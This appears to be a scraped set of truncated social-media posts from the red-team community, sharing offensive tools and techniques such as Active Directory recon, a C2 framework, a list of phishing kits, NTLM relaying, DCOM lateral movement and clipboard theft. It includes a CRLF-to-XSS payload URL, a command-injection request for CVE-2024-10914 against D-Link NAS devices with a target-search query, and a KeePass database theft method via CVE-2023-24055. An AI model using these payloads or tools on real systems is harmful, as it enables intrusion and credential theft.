SharpADWS is an Active Directory Recon and Exploit tool for Red Teams via the ADWS protocol, Inspired by @FalconForceTeam Without the LDAP protocol, it can easily bypass most traffic monitoring for LDAP #BloodHound #redteam #Pentesting #CyberSecurity github.com/wh0amitz/Sharp…

Over a year ago, I left my position at WithSecure to start a new journey, create something new, and do my own thing. Today, I'm excited to publicly announce what I've been working on all this time. Introducing 0xC2, a cross-platform C2 framework targeting Windows, Linux, and

It's alive! Apeman is a graph-based tool to model AWS IAM permissions. This marks the start of a new journey to methodically identify and remediate IAM attack paths, and I look forward to learning together with y'all. github.com/hotnops/apeman

Folks, the NIST National Cybersecurity Center of Excellence (NCCoE), Microsoft, and 24 other organizations have collaborated to provide you guidance on Zero Trust implementation, including labs from Microsoft for the Microsoft Security products and services. This is a treasure

☑️ TOP 10 PHISHING TOOLS TO USE IN 2024 Setoolkit - github.com/trustedsec/soc… SocialFish - github.com/UndeadSec/Soci… HiddenEye - github.com/DarkSecDevelop… Evilginx2 - github.com/kgretzky/evilg… SeeYou - (Get Location using phishing attack) - github.com/Viralmaniar/I-… SayCheese -

Short intro to ARM exploitation for beginners by 1. blog.3or.de/arm-exploitati… 2. blog.3or.de/arm-exploitati… 3. blog.3or.de/arm-exploitati… 4. blog.3or.de/arm-exploitati… Credits Dimitrios Slamaris #arm #infosec

CRLF to XSS Bypass in Hackerone program ❤️ payload:target.com/%3f%0d%0aLocat…

Decided to start a repo to collate the bits and pieces of small utils I write for oddly specific things over time while doing boxes/labs. Nothing fancy but maybe it'll save someone some time. Will be updated. github.com/CodeXTF2/codex…

Several people asked me how I detect the hooks set by an EDR on my process. Here is the code. This is highly inspired from the EDRSandblast code by Maxime Meignan and Qazeer This was one of the first project I've done ☺️ Feel free to play with it ! github.com/OtterHacker/Ho…

Don't we all get to the point where all you want to do is capture and relay NTLM and Kerberos authentications in a BOF? It's just faster to write a capture & relaying framework in C for ntlm, kerberos, dcom, smb, http, mssql with native Windows support than fixing impacket.

This has been one of my favorites for a while, but now it's time to let it go. Here's my preferred way of getting the KeePass db that we often hunt for: downgrade the executable to version 2.53, use CVE-2023-24055 and wait for the busy admin to trigger the dump of the database.

Put up the slides for my Microsoft BlueHat 2024 presentation on improvements to OleView.NET github.com/tyranid/infose… You can also grab v1.15 of OleView.NET from the PS Gallery which has the new features to generate proxy clients on the fly.

cve-2024-10914 GET /cgi-bin/account_mgr.cgi?cmd=cgi_user_add&name=%27;<INJECTED_SHELL_COMMAND>;%27 FOFA：app =D_Link-DNS-ShareCenter #exploit #poc #IoT

AD-Canaries github.com/AirbusProtect/…

Active Directory Certificate Services (AD CS) - A Beautifully Vulnerable and Mis-configurable Mess logan-goins.com/2024-05-04-ADC…

Cameradar: Hacking RTSP CCTV Cameras meterpreter.org/cameradar-hack…

Deepinstinct : DCOM Lateral movement POC abusing the IMsiServer interface - uploads and executes a payload remotely : github.com/deepinstinct/D… Ref : Forget PSEXEC: DCOM Upload & Execute Backdoor : deepinstinct.com/blog/forget-ps…

Made a BOF version of the PoC by Chris Au 's ClipboardHistoryThief This is an alternative to the built-in clipboard feature in Cobalt Strike that adds the capability to enable/disable and dump the clipboard history. github.com/incursi0n/Clip…